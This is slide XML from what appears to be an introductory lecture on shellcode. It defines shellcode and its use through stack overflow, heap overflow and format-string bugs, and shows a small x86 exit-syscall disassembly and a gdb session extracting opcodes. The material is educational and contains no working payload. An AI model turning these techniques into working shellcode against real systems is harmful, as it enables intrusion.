            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>Disassembly of section .text:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>00000000 &lt;.text&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>31 db</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>b0 01</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>4:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>cd 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn dur="indefinite" id="9" nodeType="tmRoot" restart="never">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="10" nodeType="mainSeq">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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>a sequence of machine language instructions which an already-running program can be forced to execute by altering its execution flow through software vulnerabilities :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>stack overflow, heap overflow , format strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>it is the notorious arbitrary code which can be run on systems affected by specific vulnerabilities. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Typically, a shellcode looks like: ~&gt; linux x86 ASLR DeActivation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97"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98" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{F1B10121-D101-4141-9151-4101C1D13121}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="533520"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Introduction a Shellcode </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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Now let's take a look at the other technique to extract the opcodes: writing the program in C and disassembling it. Let's consider, for instance, the binary built from the previous exit.c listing and open it with gdb:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219"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220" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{41719141-2191-4171-9121-61D1B1313161}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>In C</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223"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224" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{E1F14111-E1B1-4101-B151-51E1E1F1E100}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="335880"/>
            <a:ext cx="7543440" cy="5576760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$ gdb ./exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>GNU gdb 6.1-debian</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Copyright 2004 Free Software Foundation, Inc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Type "show copying" to see the conditions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>There is absolutely no warranty for GDB. Type "show warranty" for details.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>This GDB was configured as "i386-linux"...Using host libthread_db library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>"/lib/libthread_db.so.1".</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) break main</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Breakpoint 1 at 0x804836a</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) run</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Starting program: /ramdisk/var/tmp/exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Breakpoint 1, 0x0804836a in main ()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb) disas _exit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Dump of assembler code for function _exit:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ced9c &lt;_exit+0&gt;:</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228"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229" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{6121B191-C171-41D1-A1C1-E19151312171}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="612720"/>
            <a:ext cx="5638320" cy="5576760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x4(%esp),%ebx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ceda0 &lt;_exit+4&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>$0xfc,%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ceda5 &lt;_exit+9&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400ceda7 &lt;_exit+11&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400cedac &lt;_exit+16&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400cedae &lt;_exit+18&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>0x400cedaf &lt;_exit+19&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>End of assembler dump.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>(gdb)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
